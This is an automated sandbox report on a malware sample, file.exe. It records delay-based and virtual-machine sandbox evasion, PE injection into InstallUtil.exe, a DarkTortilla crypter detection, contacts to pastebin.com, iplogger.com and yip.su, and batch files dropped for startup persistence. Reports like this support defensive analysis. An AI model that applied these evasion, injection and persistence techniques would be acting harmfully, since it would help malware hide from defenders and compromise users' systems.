                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594422Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 8580Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 1229Jump to behavior
                      Source: C:\Users\user\Desktop\file.exe TID: 7808Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\file.exe TID: 7844Thread sleep time: -57000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\file.exe TID: 7660Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6572Thread sleep time: -23980767295822402s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6572Thread sleep time: -600000s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6572Thread sleep time: -599875s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5748Thread sleep count: 8580 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6572Thread sleep time: -599766s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6572Thread sleep time: -599656s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5748Thread sleep count: 1229 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6572Thread sleep time: -599547s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6572Thread sleep time: -599437s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6572Thread sleep time: -599328s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6572Thread sleep time: -599219s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6572Thread sleep time: -599109s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6572Thread sleep time: -599000s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6572Thread sleep time: -598890s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6572Thread sleep time: -598781s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6572Thread sleep time: -598672s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6572Thread sleep time: -598562s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6572Thread sleep time: -598453s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6572Thread sleep time: -598344s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6572Thread sleep time: -598079s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6572Thread sleep time: -597953s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6572Thread sleep time: -597844s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6572Thread sleep time: -597734s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6572Thread sleep time: -597625s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6572Thread sleep time: -597516s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6572Thread sleep time: -597406s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6572Thread sleep time: -597296s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6572Thread sleep time: -597187s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6572Thread sleep time: -597078s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6572Thread sleep time: -596969s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6572Thread sleep time: -596859s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6572Thread sleep time: -596750s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6572Thread sleep time: -596641s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6572Thread sleep time: -596531s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6572Thread sleep time: -596422s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6572Thread sleep time: -596312s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6572Thread sleep time: -596203s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6572Thread sleep time: -596094s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6572Thread sleep time: -595984s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6572Thread sleep time: -595875s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6572Thread sleep time: -595766s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6572Thread sleep time: -595656s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6572Thread sleep time: -595547s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6572Thread sleep time: -595435s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6572Thread sleep time: -595314s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6572Thread sleep time: -595187s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6572Thread sleep time: -595074s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7852Thread sleep time: -300000s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6572Thread sleep time: -594968s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6572Thread sleep time: -594859s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6572Thread sleep time: -594750s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6572Thread sleep time: -594641s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6572Thread sleep time: -594531s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6572Thread sleep time: -594422s >= -30000sJump to behavior
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599875Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599766Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599656Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599547Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599437Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599328Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599219Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599109Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598890Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598781Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598672Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598562Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598453Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598344Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598079Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597953Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597844Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597734Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597625Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597516Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597406Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597296Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597187Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597078Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596969Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596859Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596750Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596641Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596531Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596422Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596312Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596203Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596094Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595984Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595875Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595766Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595656Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595547Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595435Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595314Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595187Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595074Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 300000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594968Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594859Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594750Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594641Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594531Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594422Jump to behavior
                      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
                      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Jump to behavior
                      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Jump to behavior
                      Source: InstallUtil.exe, 00000003.00000002.2636583088.0000000005C4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}l
                      Source: Amcache.hve.3.drBinary or memory string: VMware
                      Source: Amcache.hve.3.drBinary or memory string: VMware-42 27 b7 a3 1e b0 86 f3-0a fe 06 07 d0 80 07 92
                      Source: file.exeBinary or memory string: OMicrosoft-Hyper-V-Management-PowerShell
                      Source: Amcache.hve.3.drBinary or memory string: VMware Virtual USB Mouse
                      Source: file.exe, 00000000.00000002.1773580345.0000000003FE1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1774284685.0000000005660000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: VBoxTray
                      Source: Amcache.hve.3.drBinary or memory string: vmci.syshbin
                      Source: Amcache.hve.3.drBinary or memory string: VMware, Inc.
                      Source: Amcache.hve.3.drBinary or memory string: VMware20,1hbin@
                      Source: Amcache.hve.3.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                      Source: Amcache.hve.3.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: Amcache.hve.3.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                      Source: file.exeBinary or memory string: 7Microsoft-Hyper-V-Tools-All
                      Source: Amcache.hve.3.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: Amcache.hve.3.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                      Source: Amcache.hve.3.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                      Source: file.exeBinary or memory string: IMicrosoft-Hyper-V-Management-Clients
                      Source: Amcache.hve.3.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: InstallUtil.exe, 00000003.00000002.2629038270.00000000011FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: file.exeBinary or memory string: #Microsoft-Hyper-V
                      Source: Amcache.hve.3.drBinary or memory string: vmci.sys
                      Source: Amcache.hve.3.drBinary or memory string: vmci.syshbin`
                      Source: Amcache.hve.3.drBinary or memory string: \driver\vmci,\driver\pci
                      Source: Amcache.hve.3.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: file.exeBinary or memory string: SMB2Protocol+Microsoft-Hyper-V-All
                      Source: Amcache.hve.3.drBinary or memory string: VMware20,1
                      Source: Amcache.hve.3.drBinary or memory string: Microsoft Hyper-V Generation Counter
                      Source: Amcache.hve.3.drBinary or memory string: NECVMWar VMware SATA CD00
                      Source: Amcache.hve.3.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                      Source: Amcache.hve.3.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                      Source: Amcache.hve.3.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                      Source: Amcache.hve.3.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                      Source: Amcache.hve.3.drBinary or memory string: VMware PCI VMCI Bus Device
                      Source: Amcache.hve.3.drBinary or memory string: VMware VMCI Bus Device
                      Source: Amcache.hve.3.drBinary or memory string: VMware Virtual RAM
                      Source: Amcache.hve.3.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                      Source: file.exe, 00000000.00000002.1774284685.0000000005660000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: 2051979379GSOFTWARE\VMware, Inc.\VMware VGAuth
                      Source: Amcache.hve.3.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                      Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Allocates memory in foreign processes
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and writeJump to behavior
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                      Writes to foreign memory regions
                      Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 404000Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 406000Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: CFA008Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: Amcache.hve.3.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                      Source: Amcache.hve.3.drBinary or memory string: msmpeng.exe
                      Source: Amcache.hve.3.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                      Source: Amcache.hve.3.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                      Source: Amcache.hve.3.drBinary or memory string: MsMpEng.exe

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information11
                      Scripting                      		1
                      Valid Accounts                      		Windows Management Instrumentation11
                      Scripting                      		1
                      DLL Side-Loading                      		1
                      Disable or Modify Tools                      		OS Credential Dumping2
                      File and Directory Discovery                      		Remote Services11
                      Archive Collected Data                      		1
                      Web Service                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/Job1
                      DLL Side-Loading                      		1
                      Valid Accounts                      		1
                      Deobfuscate/Decode Files or Information                      		LSASS Memory12
                      System Information Discovery                      		Remote Desktop ProtocolData from Removable Media3
                      Ingress Tool Transfer                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAt1
                      Valid Accounts                      		1
                      Access Token Manipulation                      		2
                      Obfuscated Files or Information                      		Security Account Manager11
                      Security Software Discovery                      		SMB/Windows Admin SharesData from Network Shared Drive11
                      Encrypted Channel                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCron2
                      Registry Run Keys / Startup Folder                      		311
                      Process Injection                      		12
                      Software Packing                      		NTDS1
                      Process Discovery                      		Distributed Component Object ModelInput Capture3
                      Non-Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script2
                      Registry Run Keys / Startup Folder                      		1
                      DLL Side-Loading                      		LSA Secrets31
                      Virtualization/Sandbox Evasion                      		SSHKeylogging4
                      Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Masquerading                      		Cached Domain Credentials1
                      Application Window Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      Valid Accounts                      		DCSync1
                      System Network Configuration Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      Access Token Manipulation                      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt31
                      Virtualization/Sandbox Evasion                      		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron311
                      Process Injection                      		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                      Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                      Hidden Files and Directories                      		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1508816 Sample: file.exe Startdate: 10/09/2024 Architecture: WINDOWS Score: 100 46 pastebin.com 2->46 48 yip.su 2->48 50 iplogger.com 2->50 52 Antivirus detection for URL or domain 2->52 54 Multi AV Scanner detection for submitted file 2->54 56 Yara detected DarkTortilla Crypter 2->56 60 6 other signatures 2->60 7 file.exe 3 2->7         started        11 cmd.exe 1 2->11         started        13 cmd.exe 1 2->13         started        15 6 other processes 2->15 signatures3 58 Connects to a pastebin service (likely for C&C) 46->58 process4 file5 38 C:\Users\user\AppData\Local\...\file.exe.log, ASCII 7->38 dropped 66 Writes to foreign memory regions 7->66 68 Allocates memory in foreign processes 7->68 70 Hides that the sample has been downloaded from the Internet (zone.identifier) 7->70 72 Injects a PE file into a foreign processes 7->72 17 InstallUtil.exe 15 9 7->17         started        22 conhost.exe 11->22         started        24 conhost.exe 13->24         started        26 conhost.exe 15->26         started        28 conhost.exe 15->28         started        30 conhost.exe 15->30         started        32 3 other processes 15->32 signatures6 process7 dnsIp8 40 pastebin.com 104.20.3.235, 443, 49711, 49713 CLOUDFLARENETUS United States 17->40 42 iplogger.com 104.21.76.57, 443, 49715 CLOUDFLARENETUS United States 17->42 44 yip.su 188.114.97.3, 443, 49712, 49714 CLOUDFLARENETUS European Union 17->44 34 C:\Users\...\Volrhw1xPk7ixUGFUQh9lCFk.bat, ASCII 17->34 dropped 36 C:\Users\...\Lkpj4eLKYuRL6LrNltOgK200.bat, ASCII 17->36 dropped 62 Drops script or batch files to the startup folder 17->62 64 Creates HTML files with .exe extension (expired dropper behavior) 17->64 file9 signatures10

                      Screenshots

